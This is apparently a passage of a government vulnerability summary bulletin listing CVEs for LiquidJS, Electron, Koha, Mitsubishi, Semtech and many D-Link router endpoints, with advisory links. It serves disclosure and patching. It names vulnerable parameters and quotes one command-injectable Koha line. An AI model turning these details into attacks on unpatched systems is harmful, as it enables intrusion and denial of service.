=C2=A0 harttle--liquidjs LiquidJS is a Shopify / GitHub Pages compatible te= mplate engine in pure JavaScript. Prior to 10.25.3, the replace filter in L= iquidJS incorrectly accounts for memory usage when the memoryLimit option i=
s enabled. It charges str.length + pattern.length + replacement.length byte=
s to the memory limiter, but the actual output from str.split(pattern).join= (replacement) can be quadratically larger when the pattern occurs many time=
s in the input string. This allows an attacker who controls template conten=
t to bypass the memoryLimit DoS protection with approximately 2,500x amplif= ication, potentially causing out-of-memory conditions. This vulnerability i=
s fixed in 10.25.3. 2026-04-08 3.7 CVE-2026-34166 [ https://www.cve.org/CVE= Record?id=3DCVE-2026-34166 ] https://github.com/harttle/liquidjs/security/a= dvisories/GHSA-mmg9-6m6j-jqqx https://github.com/harttle/liquidjs/commit/abc058be0f33d6372cd2216f49451831= 67abeb25
https://github.com/harttle/liquidjs/releases/tag/v10.25.3
=C2=A0 electron--electron Electron is a framework for writing cross-platfor=
m desktop applications using JavaScript, HTML and CSS. From 33.0.0-alpha.1 =
to before 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that use offscre=
en rendering with GPU shared textures may be vulnerable to a use-after-free=
. Under certain conditions, the release() callback provided on a paint even=
t texture can outlive its backing native state, and invoking it after that = point dereferences freed memory in the main process, which may lead to a cr= ash or memory corruption. Apps are only affected if they use offscreen rend= ering with webPreferences.offscreen: { useSharedTexture: true }. Apps that =
do not enable shared-texture offscreen rendering are not affected. To mitig= ate this issue, ensure texture.release() is called promptly after the textu=
re has been consumed, before the texture object becomes unreachable. This v= ulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. 2026-0= 4-06 2.3 CVE-2026-34764 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34764=
] https://github.com/electron/electron/security/advisories/GHSA-8x5q-pvf5-= 64mp
=C2=A0 electron--electron Electron is a framework for writing cross-platfor=
m desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.= 8.5, 41.1.0, and 42.0.0-alpha.5, apps that call clipboard.readImage() may b=
e vulnerable to a denial of service. If the system clipboard contains image=
data that fails to decode, the resulting null bitmap is passed unchecked t=
o image construction, triggering a controlled abort and crashing the proces=
s. Apps are only affected if they call clipboard.readImage(). Apps that do = not read images from the clipboard are not affected. This issue does not al= low memory corruption or code execution. This vulnerability is fixed in 39.= 8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. 2026-04-07 2.8 CVE-2026-34781 [ ht= tps://www.cve.org/CVERecord?id=3DCVE-2026-34781 ] https://github.com/electr= on/electron/security/advisories/GHSA-f37v-82c4-4x64
=C2=A0=20

Back to top [ #top ]

Severity Not Yet Assigned

Primary
Vendor -- Product Description Published CVSS Score Source Info Patch Info c= hamilo--chamilo-lms Chamilo LMS is a learning management system. From 1.11.=
0 to 2.0-beta.1, anyone can trigger a malicious redirect through the use of=
the redirect parameter to /login. This vulnerability is fixed in 2.0-beta.=
2. 2026-04-10 not yet calculated CVE-2025-66447 [ https://www.cve.org/CVERe= cord?id=3DCVE-2025-66447 ] https://github.com/chamilo/chamilo-lms/security/= advisories/GHSA-m82x-prv3-rwwv https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342= dbae5cbc446
=C2=A0 n/a--Stakeholder-Specific Vulnerability Categorization (SSVC) QD 202= 30821 is vulnerable to Server-side request forgery (SSRF) via a crafted req= uest 2026-04-08 not yet calculated CVE-2023-46945 [ https://www.cve.org/CVE= Record?id=3DCVE-2023-46945 ] https://qd-today.github.io/qd/ https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056
=C2=A0 n/a--Koha 23.05.10 Koha Library before 23.05.10 fails to sanitize us= er-controllable filenames prior to unzipping, leading to remote code execut= ion. The line "qx/unzip $filename -d $dirname/;" in upload-cover-image.pl i=
s vulnerable to command injection via shell metacharacters because input da=
ta can be controlled by an attacker and is directly included in a system co= mmand, i.e., an attack can occur via malicious filenames after uploading a = .zip file and clicking Process Images. 2026-04-07 not yet calculated CVE-20= 24-36057 [ https://www.cve.org/CVERecord?id=3DCVE-2024-36057 ] https://gitl= ab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_= 23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/re= lease_notes_23_05_11.md https://github.com/hacklantic/Research/tree/main/CVE-2024-36057 https://koha-community.org/koha-22-05-22-released/
=C2=A0 n/a--Koha 23.05.10 The Send Basket functionality in Koha Library bef= ore 23.05.10 is susceptible to Time-Based SQL Injection because it fails to=
sanitize the POST parameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, = allowing library users to read arbitrary data from the database. 2026-04-07=
not yet calculated CVE-2024-36058 [ https://www.cve.org/CVERecord?id=3DCVE= -2024-36058 ] https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/re= lease_notes/release_notes_23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/re= lease_notes_23_05_11.md
https://koha-community.org/koha-22-05-22-released/ https://github.com/hacklantic/Research/tree/main/CVE-2024-36058
=C2=A0 Unknown--YML for Yandex Market The YML for Yandex Market WordPress p= lugin before 5.0.26 is vulnerable to Remote Code Execution via the feed gen= eration process. 2026-04-10 not yet calculated CVE-2025-14545 [ https://www= .cve.org/CVERecord?id=3DCVE-2025-14545 ] https://wpscan.com/vulnerability/9= bb1a4ca-976c-461d-82de-8a3b04a56fbc/
=C2=A0 Canonical--Ubuntu In Ubuntu, Subiquity version 24.04.4 could leak se= nsitive user credentials during crash reporting. Upon installation failure,=
if a user submitted a bug report to Launchpad, Subiquity could include cer= tain user credentials, such as the user's plaintext Wi-Fi password, in the = attached logs. 2026-04-09 not yet calculated CVE-2025-14551 [ https://www.c= ve.org/CVERecord?id=3DCVE-2025-14551 ] noble backport - stop logging networ=
k config and identity data [ https://github.com/canonical/subiquity/pull/23=
58 ]
Stop logging identity data and network secrets [ https://github.com/canonic= al/subiquity/pull/2357 ]
=C2=A0 Mitsubishi Electric Corporation--GENESIS64 Cleartext Storage of Sens= itive Information vulnerability in Mitsubishi Electric GENESIS64 versions 1= 0.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3 and pr= ior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsubishi E= lectric Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric Ana= lytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versions 11.0=
2 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi Electr=
ic Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, Mitsubis=
hi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3 and pr= ior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97=
.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Historian=
versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions = AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics Digita=
l Solutions GENESIS versions 11.02 and prior allows a local attacker to dis= close the SQL Server credentials stored in plaintext within the local SQLit=
e file by exploiting this vulnerability, when the local caching feature usi=
ng SQLite is enabled and SQL authentication is used for the SQL Server auth= entication. As a result, the unauthorized attacker could access the SQL Ser= ver and disclose, tamper with, or destroy data on the server, potentially c= ause a denial-of-service (DoS) condition on the system. 2026-04-08 not yet = calculated CVE-2025-14815 [ https://www.cve.org/CVERecord?id=3DCVE-2025-148=
15 ] https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en= .pdf
https://jvn.jp/vu/JVNVU90646130/ https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01
=C2=A0 Mitsubishi Electric Corporation--GENESIS64 Cleartext Storage of Sens= itive Information in GUI vulnerability in Mitsubishi Electric GENESIS64 ver= sions 10.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3=
and prior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsu= bishi Electric Hyper Historian versions 10.97.3 and prior, Mitsubishi Elect= ric AnalytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versio=
ns 11.02 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi=
Electric Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, M= itsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3=
and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI version=
s 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Hi= storian versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Sol= utions AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics=
Digital Solutions GENESIS versions 11.02 and prior allows a local attacker=
to disclose the SQL Server credentials displayed in plain text in the GUI =
of the Hyper Historian Splitter feature by exploiting this vulnerability, w= hen SQL authentication is used for the SQL Server authentication. As a resu= lt, the unauthorized attacker could access the SQL Server and disclose, tam= per with, or destroy data on the server, potentially cause a denial-of-serv= ice (DoS) condition on the system. 2026-04-08 not yet calculated CVE-2025-1= 4816 [ https://www.cve.org/CVERecord?id=3DCVE-2025-14816 ] https://www.mits= ubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01 https://jvn.jp/vu/JVNVU90646130/
=C2=A0 Semtech--LR1110 An improper access control vulnerability exists in S= emtech LoRa LR11xxx transceivers running early versions of firmware where t=
he memory write command accessible via the physical SPI interface fails to = enforce write protection on the program call stack. An attacker with physic=
al access to the SPI interface can overwrite stack memory to hijack program=
control flow and achieve limited arbitrary code execution. However, the im= pact is limited to the active attack session: the device's secure boot mech= anism prevents persistent firmware modification, the crypto engine isolates=
cryptographic keys from direct firmware access, and all modifications are = lost upon device reboot or loss of physical access. 2026-04-07 not yet calc= ulated CVE-2025-14857 [ https://www.cve.org/CVERecord?id=3DCVE-2025-14857 ]=
https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-0=
01
=C2=A0 Semtech--LR1110 The Semtech LR11xx LoRa transceivers running early v= ersions of firmware contains an information disclosure vulnerability in its=
firmware validation functionality. When a host issues a firmware validity = check command via the SPI interface, the device decrypts the provided encry= pted firmware package block-by-block to validate its integrity. However, th=
e last decrypted firmware block remains uncleared in memory after the valid= ation process completes. An attacker with access to the SPI interface can s= ubsequently issue memory read commands to retrieve the decrypted firmware c= ontents from this residual memory, effectively bypassing the firmware encry= ption protection mechanism. The attack requires physical access to the devi= ce's SPI interface. 2026-04-07 not yet calculated CVE-2025-14858 [ https://= www.cve.org/CVERecord?id=3DCVE-2025-14858 ] https://www.semtech.com/company= /security/security-bulletins/sem-psa-2026-001
=C2=A0 Semtech--LR1110 The Semtech LR11xx LoRa transceivers implement secur=
e boot functionality using digital signatures to authenticate firmware. How= ever, the implementation uses a non-standard cryptographic hashing algorith=
m that is vulnerable to second preimage attacks. An attacker with physical = access to the device can exploit this weakness to generate a malicious firm= ware image with a hash collision, bypassing the secure boot verification me= chanism and installing arbitrary unauthorized firmware on the device. 2026-= 04-07 not yet calculated CVE-2025-14859 [ https://www.cve.org/CVERecord?id= =3DCVE-2025-14859 ] https://www.semtech.com/company/security/security-bulle= tins/sem-psa-2026-001
=C2=A0 Canonical--Ubuntu In Ubuntu, ubuntu-desktop-provision version 24.04.=
4 could leak sensitive user credentials during crash reporting. Upon instal= lation failure, if a user submitted a bug report to Launchpad, ubuntu-deskt= op-provision could include the user's password hash in the attached logs. 2= 026-04-09 not yet calculated CVE-2025-15480 [ https://www.cve.org/CVERecord= ?id=3DCVE-2025-15480 ] feat: don't log identity data (noble backport) [ htt= ps://github.com/canonical/ubuntu-desktop-provision/pull/1400 ]
feat: don't log identity data [ https://github.com/canonical/ubuntu-desktop= -provision/pull/1399 ]
=C2=A0 Unknown--Popup Box The Popup Box WordPress plugin before 5.5.0 does = not properly validate nonces in the add_or_edit_popupbox() function before = saving popup data, allowing unauthenticated attackers to perform Cross-Site=
Request Forgery attacks. When an authenticated admin visits a malicious pa= ge, the attacker can create or modify popups with arbitrary JavaScript that=
executes in the admin panel and frontend. 2026-04-07 not yet calculated CV= E-2025-15611 [ https://www.cve.org/CVERecord?id=3DCVE-2025-15611 ] https://= wpscan.com/vulnerability/089ea763-2421-4089-a220-251421f7f226/
=C2=A0 Ping Identity--PingIDM An insufficient granularity of access control=
vulnerability exists in PingIDM (formerly ForgeRock Identity Management) w= here administrators cannot properly configure access rules for Remote Conne= ctor Servers (RCS) running in client mode. This means attackers can spoof a=
client-mode RCS (if one exists) to intercept and/or modify an identity's s= ecurity-relevant properties, such as passwords and account recovery informa= tion. This issue is exploitable only when an RCS is configured to run in cl= ient mode. 2026-04-07 not yet calculated CVE-2025-20628 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2025-20628 ] https://backstage.forgerock.com/knowledg= e/advisories/article/a14305629?rev=3D_newest https://backstage.pingidentity.com/downloads/browse/idm/featured
=C2=A0 Nokia--MantaRay NM Nokia MantaRay NM is vulnerable to an OS command = injection vulnerability due to improper neutralization of special elements = used in an OS command in Symptom Collector application. 2026-04-07 not yet = calculated CVE-2025-24817 [ https://www.cve.org/CVERecord?id=3DCVE-2025-248=
17 ] https://www.nokia.com/we-are-nokia/security/product-security-advisory/= cve-2025-24817/
=C2=A0 Nokia--MantaRay NM Nokia MantaRay NM is vulnerable to an OS command = injection vulnerability due to improper neutralization of special elements = used in an OS command in Log Search application. 2026-04-07 not yet calcula= ted CVE-2025-24818 [ https://www.cve.org/CVERecord?id=3DCVE-2025-24818 ] ht= tps://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-202= 5-24818/
=C2=A0 Nokia--MantaRay NM Nokia MantaRay NM is vulnerable to a Relative Pat=
h Traversal vulnerability due to improper validation of input parameter on = the file system in Software Manager application. 2026-04-07 not yet calcula= ted CVE-2025-24819 [ https://www.cve.org/CVERecord?id=3DCVE-2025-24819 ] ht= tps://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-202= 5-24819/
=C2=A0 Checkmk GmbH--Checkmk Local privilege escalation in Checkmk 2.2.0 (E= OL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Chec= kmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privil= eges to root, by manipulating files in the site context that are processed = when the `omd` administrative command is run by root. 2026-04-07 not yet ca= lculated CVE-2025-39666 [ https://www.cve.org/CVERecord?id=3DCVE-2025-39666=
] https://checkmk.com/werk/18891
=C2=A0 n/a--OwnTone - open source (audio) media server=C2=A0 owntone-server=
2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking=
. 2026-04-10 not yet calculated CVE-2025-44560 [ https://www.cve.org/CVERec= ord?id=3DCVE-2025-44560 ] https://github.com/owntone/owntone-server/issues/= 1873
https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3
=C2=A0 D-Link[.]com -- D-Link DI-8300 D-Link DI-8300 v16.07.26A1 was discov= ered to contain a buffer overflow via the ip parameter in the ip_position_a=
sp function. This vulnerability allows attackers to cause a Denial of Servi=
ce (DoS) via a crafted input. 2026-04-08 not yet calculated CVE-2025-45057 =
[ https://www.cve.org/CVERecord?id=3DCVE-2025-45057 ] https://www.dlink.com= /en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=3DDI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8300 D-Link DI-8300 v16.07.26A1 was discov= ered to contain a buffer overflow via the fx parameter in the jingx_asp fun= ction. This vulnerability allows attackers to cause a Denial of Service (Do=
S) via a crafted input. 2026-04-08 not yet calculated CVE-2025-45058 [ http= s://www.cve.org/CVERecord?id=3DCVE-2025-45058 ] https://www.dlink.com/en/se= curity-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=3DDI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8300 D-Link DI-8300 v16.07.26A1 was discov= ered to contain a buffer overflow via the fn parameter in the tgfile_htm fu= nction. This vulnerability allows attackers to cause a Denial of Service (D= oS) via a crafted input. 2026-04-08 not yet calculated CVE-2025-45059 [ htt= ps://www.cve.org/CVERecord?id=3DCVE-2025-45059 ] https://www.dlink.com/en/s= ecurity-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=3DDI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 www[.]rrweb[.]io/ -- rrwebplayer A cross-site scripting (XSS) vulner= ability in rrweb-snapshot before v2.0.0-alpha.18 allows attackers to execut=
e arbitrary web scripts or HTML via a crafted payload. 2026-04-09 not yet c= alculated CVE-2025-45806 [ https://www.cve.org/CVERecord?id=3DCVE-2025-4580=
6 ] https://github.com/rrweb-io/rrweb https://github.com/rrweb-io/rrweb/tree/master/packages/rrweb-snapshot https://github.com/rrweb-io/rrweb/issues/1817
=C2=A0 Google--Android In importWrappedKey of KMKeymasterApplet.java, there=
is a possible way access keys that should be restricted due to improper in= put validation. This could lead to local information disclosure with no add= itional execution privileges needed. User interaction is not needed for exp= loitation. 2026-04-06 not yet calculated CVE-2025-48651 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2025-48651 ] https://source.android.com/docs/security= /bulletin/2026/2026-04-01
=C2=A0 n/a--n/a Jizhicms v2.5.4 is vulnerable to Server-Side Request Forger=
y (SSRF) in User Evaluation, Message, and Comment modules. 2026-04-09 not y=
et calculated CVE-2025-50228 [ https://www.cve.org/CVERecord?id=3DCVE-2025-= 50228 ] https://github.com/Cherry-toto/jizhicms
https://www.jizhicms.cn
https://github.com/Cherry-toto/jizhicms/issues/104
=C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper validation of user input in = the qj.asp endpoint. 2026-04-08 not yet calculated CVE-2025-50644 [ https:/= /www.cve.org/CVERecord?id=3DCVE-2025-50644 ] https://www.dlink.com/en/secur= ity-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A vulnerability has been discovered i=
n D-Link DI-8003 16.07.26A1, which can lead to a buffer overflow when the s=
parameter in the pppoe_list_opt.asp endpoint is manipulated. By sending a = crafted request with an excessively large value for the s parameter, an att= acker can trigger a buffer overflow condition. 2026-04-08 not yet calculate=
d CVE-2025-50645 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50645 ] http= s://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to insufficient input validation on the = name parameter in the /qos_type_asp.asp endpoint. 2026-04-08 not yet calcul= ated CVE-2025-50646 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50646 ] h= ttps://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1, specifically in the handling of the wans pa= rameter in the qos.asp endpoint. 2026-04-08 not yet calculated CVE-2025-506=
47 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50647 ] https://www.dlink.= com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to inadequate input validation in the /t= ggl.asp endpoint. 2026-04-08 not yet calculated CVE-2025-50648 [ https://ww= w.cve.org/CVERecord?id=3DCVE-2025-50648 ] https://www.dlink.com/en/security= -bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper input validation in the vlan= _name parameter in the /shut_set.asp endpoint. 2026-04-08 not yet calculate=
d CVE-2025-50649 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50649 ] http= s://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to inadequate validation of input size i=
n the routes_static parameter in the /router.asp endpoint. 2026-04-08 not y=
et calculated CVE-2025-50650 [ https://www.cve.org/CVERecord?id=3DCVE-2025-= 50650 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 An issue in D-Link DI-8003 16.07.26A1=
related to improper handling of the id parameter in the /saveparm_usb.asp = endpoint. 2026-04-08 not yet calculated CVE-2025-50652 [ https://www.cve.or= g/CVERecord?id=3DCVE-2025-50652 ] https://www.dlink.com/en/security-bulleti=
n/
https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the name and mem=
parameters in the /time_group.asp endpoint. 2026-04-08 not yet calculated = CVE-2025-50653 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50653 ] https:= //www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper validation of the id paramet=
er in the /thd_member.asp endpoint. 2026-04-08 not yet calculated CVE-2025-= 50654 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50654 ] https://www.dli= nk.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
er in the /thd_group.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0655 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50655 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the pid paramete=
r in the /trace.asp endpoint. 2026-04-08 not yet calculated CVE-2025-50657 =
[ https://www.cve.org/CVERecord?id=3DCVE-2025-50657 ] https://www.dlink.com= /en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the custom_error=
parameter in the /user.asp endpoint. 2026-04-08 not yet calculated CVE-202= 5-50659 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50659 ] https://www.d= link.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
er in the /url_member.asp endpoint. 2026-04-08 not yet calculated CVE-2025-= 50660 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50660 ] https://www.dli= nk.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of multiple paramet= ers in the /url_rule.asp endpoint. An attacker can exploit this vulnerabili=
ty by sending a crafted HTTP GET request with parameters name, en, ips, u, = time, act, rpri, and log. 2026-04-08 not yet calculated CVE-2025-50661 [ ht= tps://www.cve.org/CVERecord?id=3DCVE-2025-50661 ] https://www.dlink.com/en/= security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
er in the /url_group.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0662 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50662 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the name paramet=
er in the /usb_paswd.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0663 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50663 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
e /user_group.asp endpoint. The attacker can exploit this vulnerability by = sending a crafted HTTP GET request with parameters name, mem, pri, and attr=
. 2026-04-08 not yet calculated CVE-2025-50664 [ https://www.cve.org/CVERec= ord?id=3DCVE-2025-50664 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of input parameters=
in the /web_keyword.asp endpoint. An attacker can exploit this vulnerabili=
ty by sending a crafted HTTP GET request via the name, en, time, mem_gb2312=
, and mem_utf8 parameters. 2026-04-08 not yet calculated CVE-2025-50665 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2025-50665 ] https://www.dlink.com/en= /security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of multiple paramet= ers in the /web_post.asp endpoint. An attacker can exploit this vulnerabili=
ty by sending a crafted HTTP GET request in parameters such as name, en, us= er_id, log, and time. 2026-04-08 not yet calculated CVE-2025-50666 [ https:= //www.cve.org/CVERecord?id=3DCVE-2025-50666 ] https://www.dlink.com/en/secu= rity-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the iface parame= ter in the /wan_line_detection.asp endpoint. 2026-04-08 not yet calculated = CVE-2025-50667 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50667 ] https:= //www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the s parameter =
in the /web_list_opt.asp endpoint. 2026-04-08 not yet calculated CVE-2025-5= 0668 [ https://www.cve.org/CVERecord?id=3DCVE-2025-50668 ] https://www.dlin= k.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 and DI-8003G 19.12.10A1 due to improper hand= ling of the wan_ping parameter in the /wan_ping.asp endpoint. 2026-04-08 no=
t yet calculated CVE-2025-50669 [ https://www.cve.org/CVERecord?id=3DCVE-20= 25-50669 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
e /xwgl_bwr.asp endpoint. An attacker can exploit this vulnerability by sen= ding a crafted HTTP GET request in the name, qq, and time parameters. 2026-= 04-08 not yet calculated CVE-2025-50670 [ https://www.cve.org/CVERecord?id= =3DCVE-2025-50670 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
e /xwgl_ref.asp endpoint. An attacker can exploit this vulnerability by sen= ding a crafted HTTP GET request with excessively long strings in parameters=
name, en, user_id, shibie_name, time, act, log, and rpri. 2026-04-08 not y=
et calculated CVE-2025-50671 [ https://www.cve.org/CVERecord?id=3DCVE-2025-= 50671 ] https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in th=
e /yyxz_dlink.asp endpoint. 2026-04-08 not yet calculated CVE-2025-50672 [ = https://www.cve.org/CVERecord?id=3DCVE-2025-50672 ] https://www.dlink.com/e= n/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md =C2=A0 D-Link[.]com -- D-Link DI-8003 A buffer overflow vulnerability exist=
s in D-Link DI-8003 16.07.26A1 due to improper handling of the http_lanport=
